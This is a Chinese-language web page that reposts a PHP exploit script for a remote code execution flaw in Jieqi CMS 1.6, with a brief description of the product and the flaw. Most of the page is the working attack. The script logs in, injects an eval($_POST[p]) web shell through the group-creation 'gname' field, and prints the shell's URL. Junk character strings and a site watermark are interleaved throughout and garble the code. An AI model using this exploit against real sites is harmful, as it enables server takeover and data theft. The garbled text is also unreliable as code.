杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
( w( Q9 N$ i2 j" A7 ^- t' b8 b7 N5 |$ R0 `$ q
6 w. H7 S8 J9 D, v9 m$ V2 M该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
9 W8 P( e- k- w% P% C1 b2 c* N" h 需要有一个能创建圈子的用户。! ~- A2 C4 Z1 H, t; j/ P
7 M: Z E" X4 X+ Y, S
<?php( }2 O$ p" W8 o/ H- @' B) L/ s1 z
! x' r e) \5 e3 c* f X: |) v
print_r('' m& n+ a5 U) z) m9 Y
+---------------------------------------------------------------------------+1 G- L& ]/ F/ w8 p6 g1 i
Jieqi CMS V1.6 PHP Code Injection Exploit
& n9 {4 L1 B0 i+ H0 J# \by flyh4t# _$ h \4 k8 B2 i8 U. E3 S2 b
mail: phpsec at hotmail dot com
6 f9 V, y; }( }. Steam: http://www.wolvez.org- E3 K" X0 p9 e
+---------------------------------------------------------------------------+$ b/ u. k: b2 i8 q: X
'); /** f) J- n3 i8 ~+ p- P8 V/ Z, N6 E
* works regardless of php.ini settings
9 p6 h; N i4 d: D5 g; e% g*/ if ($argc < 5) { print_r('7 ?2 k0 r) q$ K l- P
+---------------------------------------------------------------------------+3 A/ \/ o0 y; m, h5 N0 g
Usage: php '.$argv[0].' host path username
0 y! f% B% c7 o3 |4 lhost: target server (ip/hostname)
; f8 U- b5 b) ~" x8 r9 D9 d) G6 apath: path to jieqicms
9 k2 P7 i- b! }% S% Luasename: a username who can create group- |& L6 R4 s% c
Example:
) z9 B7 v [9 w( a0 }6 c! R; Cphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+ l& }4 x8 |7 P8 T6 A& i+---------------------------------------------------------------------------+
* Y. C. R1 d. J/ |1 [+ |7 V'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961 u1 [/ u4 B) K; }2 l+ }; G9 ]
Content-Disposition: form-data; name="gname"
3 b/ W, X. _& J j 0 h, j# a, O$ ~- z2 W0 f; B
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
$ \) o) _5 e$ w6 D- U-----------------------------23281168279961
4 n8 ^$ L* O4 n7 d& i' kContent-Disposition: form-data; name="gcatid"5 e6 w5 Z% A0 i
8 a) o2 U4 O( g* ~
1
4 j% L5 E S! d, }/ q. w-----------------------------23281168279961
+ g* _* _2 M1 d/ tContent-Disposition: form-data; name="gaudit"9 d8 d% U5 \3 `0 j
2 b0 A) F; k+ Y% C$ D
1/ t) |5 U. o" f! o7 v, f
-----------------------------23281168279961- S" M5 Z* v6 z! F1 d$ P# ]
Content-Disposition: form-data; name="gbrief"( _6 O; V+ s9 E/ L( k/ E
& i5 m/ h( b, {7 B% E0 i
17 n* m3 q$ f" S4 `4 O* E/ v4 l! D
-----------------------------23281168279961--
, F; K& W7 y1 k# x% t'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com% f8 D6 |/ s' D1 T& O
7 c: d- d# R" A( ?& f
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |